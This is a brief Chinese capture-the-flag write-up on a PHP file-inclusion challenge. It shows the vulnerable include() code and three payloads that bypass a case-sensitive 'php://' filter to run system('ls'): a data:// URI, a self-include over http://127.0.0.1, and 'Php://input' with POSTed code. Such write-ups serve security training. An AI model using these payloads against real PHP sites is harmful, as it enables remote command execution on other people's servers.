文件包含漏洞(PHP伪协议)
攻防世界Web_php_include
去博客设置页面,选择一款你喜欢的代码片高亮样式,下面展示同样高亮的 代码片
.
// An highlighted block
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>
第一种方法
code=data://text/plain,<?php system("ls"); ?>
第二种方法
code=http://127.0.0.1/index.php?hello=<?php system("ls") ?>
第三种方法
code=Php://input
POST提交<?php system("ls"); ?>